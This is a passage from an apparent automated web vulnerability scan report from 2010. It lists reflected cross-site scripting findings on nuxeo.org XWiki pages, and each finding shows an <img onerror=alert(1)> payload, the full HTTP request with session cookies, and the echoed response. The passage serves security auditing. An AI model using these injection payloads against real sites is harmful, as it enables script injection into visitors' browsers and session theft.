Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 was submitted in the REST URL parameter 5. This input was echoed as 849fa<img src=a onerror=alert(1)>8082881189 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/Admin849fa<img%20src%3da%20onerror%3dalert(1)>8082881189 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12833
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin849fa%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8082881189'>Admin849fa<img src=a onerror=alert(1)>8082881189</a>
...[SNIP]...

4.548. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/Admin

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 was submitted in the REST URL parameter 5. This input was echoed as 1a623"><img src=a onerror=alert(1)>31c99b72496 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/Admin1a623"><img%20src%3da%20onerror%3dalert(1)>31c99b72496 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:54 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12908
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/Admin1a623%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31c99b72496?format=xar&amp;name=XWiki.Admin1a623"><img src=a onerror=alert(1)>31c99b72496&amp;pages=XWiki.Admin1a623">
...[SNIP]...

4.549. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe was submitted in the REST URL parameter 4. This input was echoed as 90042<img src=a onerror=alert(1)>f4f08861abe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki90042<img%20src%3da%20onerror%3dalert(1)>f4f08861abe/JaneZupan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12910
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWiki90042%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef4f08861abe/">XWiki90042<img src=a onerror=alert(1)>f4f08861abe</a>
...[SNIP]...

4.550. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3 was submitted in the REST URL parameter 4. This input was echoed as febcb"><img src=a onerror=alert(1)>50bdafe04d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWikifebcb"><img%20src%3da%20onerror%3dalert(1)>50bdafe04d3/JaneZupan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:12 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12976
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWikifebcb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E50bdafe04d3/JaneZupan?format=xar&amp;name=XWikifebcb"><img src=a onerror=alert(1)>50bdafe04d3.JaneZupan&amp;pages=XWikifebcb">
...[SNIP]...

4.551. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 was submitted in the REST URL parameter 5. This input was echoed as 29e70<img src=a onerror=alert(1)>3e0dea1fff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/JaneZupan29e70<img%20src%3da%20onerror%3dalert(1)>3e0dea1fff1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:39 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan29e70%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3e0dea1fff1'>JaneZupan29e70<img src=a onerror=alert(1)>3e0dea1fff1</a>
...[SNIP]...

4.552. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/JaneZupan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed was submitted in the REST URL parameter 5. This input was echoed as 2299e"><img src=a onerror=alert(1)>dafd44348ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/JaneZupan2299e"><img%20src%3da%20onerror%3dalert(1)>dafd44348ed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12960
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/JaneZupan2299e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edafd44348ed?format=xar&amp;name=XWiki.JaneZupan2299e"><img src=a onerror=alert(1)>dafd44348ed&amp;pages=XWiki.JaneZupan2299e">
...[SNIP]...

4.553. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639 was submitted in the REST URL parameter 4. This input was echoed as 5ad3d"><img src=a onerror=alert(1)>d2452f8f639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki5ad3d"><img%20src%3da%20onerror%3dalert(1)>d2452f8f639/LiseKemen HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12976
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki5ad3d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed2452f8f639/LiseKemen?format=xar&amp;name=XWiki5ad3d"><img src=a onerror=alert(1)>d2452f8f639.LiseKemen&amp;pages=XWiki5ad3d">
...[SNIP]...

4.554. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520 was submitted in the REST URL parameter 4. This input was echoed as f82cb<img src=a onerror=alert(1)>e26b388e520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWikif82cb<img%20src%3da%20onerror%3dalert(1)>e26b388e520/LiseKemen HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:04 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12910
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/XWikif82cb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee26b388e520/">XWikif82cb<img src=a onerror=alert(1)>e26b388e520</a>
...[SNIP]...

4.555. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 was submitted in the REST URL parameter 5. This input was echoed as f7c5f<img src=a onerror=alert(1)>e5413791935 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/LiseKemenf7c5f<img%20src%3da%20onerror%3dalert(1)>e5413791935 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:37 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemenf7c5f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5413791935'>LiseKemenf7c5f<img src=a onerror=alert(1)>e5413791935</a>
...[SNIP]...

4.556. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/XWiki/LiseKemen

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 was submitted in the REST URL parameter 5. This input was echoed as 2f67e"><img src=a onerror=alert(1)>480fe619997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/XWiki/LiseKemen2f67e"><img%20src%3da%20onerror%3dalert(1)>480fe619997 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12960
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/XWiki/LiseKemen2f67e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E480fe619997?format=xar&amp;name=XWiki.LiseKemen2f67e"><img src=a onerror=alert(1)>480fe619997&amp;pages=XWiki.LiseKemen2f67e">
...[SNIP]...

4.557. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39 was submitted in the REST URL parameter 4. This input was echoed as a2182"><img src=a onerror=alert(1)>af9c268fe39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skinsa2182"><img%20src%3da%20onerror%3dalert(1)>af9c268fe39/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12937
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skinsa2182%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf9c268fe39/toucan?format=xar&amp;name=skinsa2182"><img src=a onerror=alert(1)>af9c268fe39.toucan&amp;pages=skinsa2182">
...[SNIP]...

4.558. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729 was submitted in the REST URL parameter 4. This input was echoed as a8e50<img src=a onerror=alert(1)>a4e8dc4d729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skinsa8e50<img%20src%3da%20onerror%3dalert(1)>a4e8dc4d729/toucan HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:55 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12871
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/skinsa8e50%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea4e8dc4d729/">skinsa8e50<img src=a onerror=alert(1)>a4e8dc4d729</a>
...[SNIP]...

4.559. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 was submitted in the REST URL parameter 5. This input was echoed as 6c090"><img src=a onerror=alert(1)>927538bfc55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skins/toucan6c090"><img%20src%3da%20onerror%3dalert(1)>927538bfc55 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12921
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
